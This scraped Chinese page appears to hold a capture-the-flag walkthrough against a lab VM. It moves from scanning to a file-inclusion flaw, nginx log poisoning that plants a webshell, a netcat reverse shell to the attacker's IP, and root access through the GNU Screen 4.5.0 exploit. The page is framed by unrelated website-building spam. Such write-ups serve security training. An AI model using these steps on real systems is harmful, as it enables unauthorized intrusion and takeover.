当前位置: 首页 > news >正文

广州网站建设新际企业官网流程

广州网站建设新际,企业官网流程,爱站挖词,学校网站建设软件推荐信息收集 主机扫描 sudo arp-scan -l端口扫描 nmap -p- -A 192.168.16.172漏洞发现 浏览器访问靶机IP 在Contact找到类似提交数据的地方 点击submit#xff0c;数字发生变化。不断刷新的话#xff0c;数字依然会发生变化 使用bp抓包发送重发器查看数据包 再次点击发送查看…信息收集 主机扫描 sudo arp-scan -l端口扫描 nmap -p- -A 192.168.16.172漏洞发现 浏览器访问靶机IP 在Contact找到类似提交数据的地方 点击submit数字发生变化。不断刷新的话数字依然会发生变化 使用bp抓包发送重发器查看数据包 再次点击发送查看数据返回包 不断重发数据发现footer不断变化感觉可能存在一个独立的脚本爆破目录查看一下 dirsearch -u 192.168.16.172 -i 200命令解释 dirsearch -u 192.168.16.172 -i 200 是一个用于目录扫描的命令下面对该命令进行详细解释 dirsearch是一个目录扫描工具用于探测Web服务器上的目录和文件。-u 192.168.16.172指定要扫描的目标URL或IP地址。在这个示例中目标是 192.168.16.172。你可以替换这个IP地址为需要扫描的实际目标。-i 200指定要忽略的HTTP状态码。在这个示例中200 表示忽略返回状态码为200的响应。也就是说当目标返回200状态码时不会将其视为敏感路径或文件。 通过执行这条命令dirsearch 工具将发送不同的HTTP请求到目标URL并根据目标服务器的响应来确定是否存在可以访问的目录、文件或敏感路径。它可以帮助发现Web应用程序中可能存在的配置错误、暴露的资源、备份文件等问题。 浏览器访问192.168.16.172这个页面 刷新页面进行查看刷新页面后数字发生变化 将bp数据包中的GET请求更改为/thankyou.php?filefooter.php然后点击发送 再点击发送进行查看 可以确定这里可能存在文件包含漏洞 漏洞利用 再将访问路径改为/etc/passwd可以看到passwd文件 说明了程序代码再处理文件包含是没有严格控制我们可以把访问路径更改为木马文件 发现报了404未找到的错误 对于配置了nginx的网站无论网站有什么操作都会被记录在/var/log/nginx/access.log和/var/log/nginx/error.log中 /thankyou.php?file/var/log/nginx/access.log木马上传成功利用蚁剑进行连接 http://192.168.16.172/thankyou.php?file/var/log/nginx/access.log进行反弹shell kali进行监听 nc -lvvp 8848 #监听网段中所有8848端口利用蚁剑中的虚拟终端反弹shell到攻击机kali上 nc -e /bin/bash 192.168.16.176 8848再看kali已经连接到了 使用python脚本开启交互模式 python -c import pty;pty.spawn(/bin/bash)查看id发现只是普通用户的权限 权限提升 find / -user root -prem /4000 2/dev/null经过查找得知GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。用户可以通过该软件同时连接多个本地或远程的命令行会话并在其间自由切换。GNU Screen可以看作是窗口管理器的命令行界面版本。它提供了统一的管理多个会话的界面和相应的功能。 尝试用searchsploit搜索是否存在漏洞重新打开一个终端进行漏洞查找 searchsploit screen 4.5.0找出41154.sh的绝对路径 searchsploit -p linx/local/41151.sh查看文件内容 cat /usr/share/exploitdb/exploits/linux/local/41154.sh按照文件的说明可分为三部分将第一个框里内容保存为第一文件名为libhax.c然后使用黄色选取的命令编译编译结束会生成libhax.so文件。 第二个框里内容保存为rootshell.c文件使用黄色选区的命令编译编译结束后生成rootshell文件。 将第三个框里内容保存为第三个文件保存为run.sh 。 这个名字随意。 通过蚁剑把libhax.c和rootshell.c拖进靶机跟目录下的tmp目录下 在虚拟终端中对libhax.c和rootshell.c这两个文件进行编译 在蚁剑中点击文件管理进入根目录下的tmp目录进行刷新后编译的文件就出来了 然后把 run.sh也通过蚁剑拖进靶机根目录下的tmp目录中注意是 /tmp/ 那么原来的libhax.c和rootshell.c这两个文件可以删除了因为已经编译好了留着也没有价值 回到通过python得到的交互式的shell里切换到/tmp目录下 运行run.sh输入bash ./run.sh进行提权 通过查看id已知是root用户 进入/root查看是否有flag 总结 信息收集主机发现 netdiscouver端口扫描 nmap目录爆破 dirsearch 漏洞利用bp抓包分析数据包,测试到有文件包含漏洞木马上传查看日志反弹shellpython交互shell 提权find / -user root -perm /4000 2/dev/null#找到所有具有root权限的可执行文件searchsploit screen 4.5.0#通过searchsploit找到Screen这款由GNU计划开发的用于命令行终端切换的自由软件的漏洞libhax.c和rootshell.c文件的编译 run.shbash ./run.sh 提权
http://www.zqtcl.cn/news/757153/

相关文章:

  • 网站管理员登陆后缀重庆建筑证书查询网站
  • 义乌seoseo建站外贸
  • 只做早餐的网站老网站做seo能不能重新注册
  • 门户网站开发需要多少钱百姓网网站源码
  • 网站设计要学哪些保山网站建设
  • 怎样免费设计网站建设企业网站系统源码
  • 海报设计模板网站找网络公司做网站需要注意
  • 网站开发前端后端书籍wordpress 加文章列表
  • 泰安北京网站建设商业网站的后缀一般为
  • 必须网站的访问量wordpress标题大小
  • qq怎么做放资源的网站英语seo什么意思
  • 学生心理健康网站建设论文php开源内容管理系统
  • 机关网站内容建设雄安专业网站建设
  • 有域名有空间怎么做网站怎么制作网站封面
  • 注册域名哪个网站好信息技术制作网站首页
  • 企业网站app制作价格国外外链平台
  • 泉州市网站设计企业网络有限公司经营范围
  • 电子商务网站创业计划书后台管理系统登录
  • 蚂蚁建站网页传奇游戏单职业
  • 标准通网站建设广州 flash 网站
  • 怎么做游戏自动充值的网站淘宝购物平台
  • 免费帮助建站营销策略怎么写
  • 12380 举报网站建设优秀个人网站
  • 简洁网站模板素材用wordpress上传源砖
  • 高密做网站电影html网页模板设计素材
  • 湖北网络营销网站襄阳网站建设-飞鱼网络
  • 想更新公司网站怎么做关于网站开发的自我评价
  • 找建筑工作哪个网站好新增网站 备案
  • 格力网站的建设情况wordpress mysql 密码重置
  • 网站access数据怎么做高端品牌网站建设的目的